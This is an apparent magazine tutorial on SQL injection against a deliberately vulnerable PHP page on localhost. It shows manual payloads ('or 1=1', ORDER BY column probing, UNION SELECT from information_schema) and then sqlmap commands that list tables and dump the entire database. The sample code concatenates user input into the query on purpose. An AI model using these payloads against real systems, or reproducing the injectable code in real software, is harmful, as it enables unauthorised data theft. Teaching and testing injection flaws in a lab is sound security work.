SQLMAP – Automated Sql Injection Testing Tool

January 11, 2012, by | Start Discussion

Sql injection is one of the most common vulnerability found in web applications today. Exploiting SQL Injection through manual approach is somewhat tedious. Using flags like ―or 1=1–‖ , ―and 1>2‖ we can find out if vulnerability is present but exploiting the vulnerability needs altogether different approach. Tools like Sqlmap, Havij and Pangolin are helpful in exploiting sql injection.

In this article we will use a sample code below to showcase how vulnerability can be exploited manually and then by using Sqlmap tool.

A sample code –

<?php
$id=$_GET["id"];
$con = mysql_connect("localhost","db-admin","db-name");
if (!$con)
{
die('Could not connect: ' . mysql_error());
}
mysql_select_db("table-name", $con);
$query= "SELECT * FROM table-name where id=$id ";
echo "<h1>".$query. "</h1>";
$result = mysql_query($query);
while($row = mysql_fetch_array($result))
{
echo $row['id'] . " " . $row['name'];
echo "<br />";
}
mysql_close($con);
?>

Here we have deployed the application with the following code and accessed the url:

http://localhost/xampp/1.php?id=1

Which gives us the data present in db for id=1

If we give a single quote(‗) in the end of the query we get below screen with unhandled error message from database. This shows there is a possibility of SQL injection.

If we add ―or 1=1‖ in the end of URL we get all the data from that row. This shows that SQL Injection is possible.

Now let‘s get into exploiting the vulnerability. Our first task is to find number of columns selected in the query. We would find that by adding ―order by id=1,2,3…‖ and so on at the end of the URL.

For order by 4, data retrieved is error that means there are three columns present in this select query. Now, we would play with the url, to dig more details about database. We have given url as – http://localhost/xampp/1.php?id=1 union select system_user(), 1, 2from information_schema.schema_privileges— This would give system user of the database.

Similarly, we would find table name, table_schema, columns and data by manipulating the url like given below http://localhost/xampp/1.php?id=1 union select table_name, 1, 2 from information_schema.columns—

However, whatever exercise we did to find vulnerability in the web application manually, can be done using SQLMap Tool in few minutes. To use this tool, you just need a python Interpreter and SqlMap tool. We issue following command –

sqlmap.py -u 
http://localhost/xampp/1.php?id=1 

and lots of information about given web application is retrieved in seconds like: Issue 24 – Jan 2011 | Page – 7 GET parameter ‗id‘ is vulnerable and 3 columns are present in the given table.

Let‘s proceed. We got to know that DBMS is MySql 5.0.11, WebServer is Apache 2.2.17 deployed on windows machine.

We would now try to find current database, tables, columns, and data, means, complete surgery of the application. So we can give below command options to find all details about the application. 

sqlmap.py -u
http://localhost/xampp/1.php?id=1 --current-db

It gave the name of current database.

Now, the time is to know all the tables present.

sqlmap.py -u

http://localhost/xampp/1.php?id=1 --tables 

It gave the list of all the tables present in databases.

Finally, to retrieve all the data present in database, following command can be used:

sqlmap.py -u

http://localhost/xampp/1.php?id=1 --dump-all 

All the date is retrieved and saved in output folder of sqlmap directory. Tool has lot more capabilities and can be used to perform dictionary attacks, create backdoor shell etc. So try it out and Happy hacking  Shahbaz Shantanu Shukla


Prajwal is a Senior Developer at Matriux, publishing articles for CHmag under “Matriux Vibhag” every month. Also a n|u Hyderabad chapter lead. Currently pursuing Masters from Texas Tech University, USA. A CEH v6 certified.

Leave a Reply